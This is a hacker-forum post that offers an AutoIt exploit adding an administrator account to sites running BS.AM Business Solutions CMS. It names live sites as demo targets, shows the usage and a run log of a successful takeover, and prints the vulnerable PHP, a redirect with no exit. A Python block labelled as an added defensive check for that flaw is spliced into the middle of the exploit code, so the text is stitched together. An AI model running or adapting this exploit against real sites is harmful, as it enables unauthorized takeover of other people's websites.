This is my private exploit (it is already public) for yet another CMS from the fucked xaçiks.
The purpose of the exploit is to add an ADMIN account to the target site. What comes next is obvious. http://pastebin.com/0z8TnP1n
Video:
If anyone has trouble compiling it, let me know and I will provide the compiled version.
BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT.
THIS IS AN EXPLOIT WRITTEN IN THE AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
ON SUCCESSFUL REMOTE EXPLOITATION IT WILL ADD A NEW ADMIN TO THE TARGET SITE.
***** THIS IS A WHOLE EXPLOIT! *****
THANK YOU!
FEW DEMOS:
http://asba.am
http://doors.am
DEMO USAGE:
>poc.exe http://asba.am bigbang bigbang
##############################################################
(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: poc.exe http://site.tld username password
[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]
##################################################
Trying to add new admin:
To Site:www.asba.am
With Username: bigbang
With Password: bigbang
##################################################
##################################################
Exploit Try Count:2
##################################################
Error Count: 0
##################################################
Count of errors during exploitation : 0
##################################################
[*] Seems we are going to travel xD. [*]
Try to login @
Site: asba.am/cms/index.php
With Username: bigbang
With Password: bigbang
##################################################
[*] Exit [*]
##################################################
VULNERABLE CODE:
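NOTICE: the script continues its execution because exit; is missing after header();
header() only sets a Location response header; the server still runs the rest of admin.php for a client that has no valid session.
FUNNY TO SEE HOW MANY PROGRAMMERS FAIL TO UNDERSTAND THIS ;)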
//cms/admin.php
============SNIP BEGINS============
<?
session_start();
if ($_SESSION['login11_error'] != "no")
header("Location: index.php");
include 'config.php';?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>cms::</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="css/main.css" />
<script type="text/javascript" src="javascript/jquery-1.4.2.js"></script>
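An added example (not part of the original post or the exploit): a heuristic Python check for auditing your own PHP source for the flaw shown in cms/admin.php above, a Location redirect that is not followed by exit or die. The function name, the regexes and the FIXED sample are assumptions made for this illustration; VULNERABLE reproduces the guard from the page's snippet.

```python
import re

# Heuristic patterns, not a PHP parser: a Location redirect up to its ';',
# then any whitespace/comments, then the exit/die that should follow.
REDIRECT = re.compile(r"header\s*\(\s*['\"]\s*Location\s*:.*?\)\s*;", re.I | re.S)
SKIP = re.compile(r"(?:\s+|//[^\n]*|#[^\n]*|/\*.*?\*/)*", re.S)
TERMINATOR = re.compile(r"(?:exit|die)\b", re.I)

def find_unterminated_redirects(php_source):
    """Return 1-based line numbers of Location redirects not followed by exit/die."""
    findings = []
    for m in REDIRECT.finditer(php_source):
        next_stmt = SKIP.match(php_source, m.end()).end()
        if not TERMINATOR.match(php_source, next_stmt):
            findings.append(php_source.count("\n", 0, m.start()) + 1)
    return findings

# The guard from cms/admin.php as shown on this page.
VULNERABLE = """<?
session_start();
if ($_SESSION['login11_error'] != "no")
header("Location: index.php");
include 'config.php';?>
"""

# Constructed hardened form (assumption): braces around the guard and exit after the redirect.
FIXED = """<?php
session_start();
if ($_SESSION['login11_error'] != "no") {
    header("Location: index.php");
    exit; // stop here so nothing below runs for an unauthenticated client
}
include 'config.php';
"""

if __name__ == "__main__":
    for name, src in (("VULNERABLE", VULNERABLE), ("FIXED", FIXED)):
        print(name, find_unterminated_redirects(src))
```

The check is deliberately strict: a redirect followed by return instead of exit or die is also reported and needs a manual look.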
if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf
if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf
ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));
if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf
Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error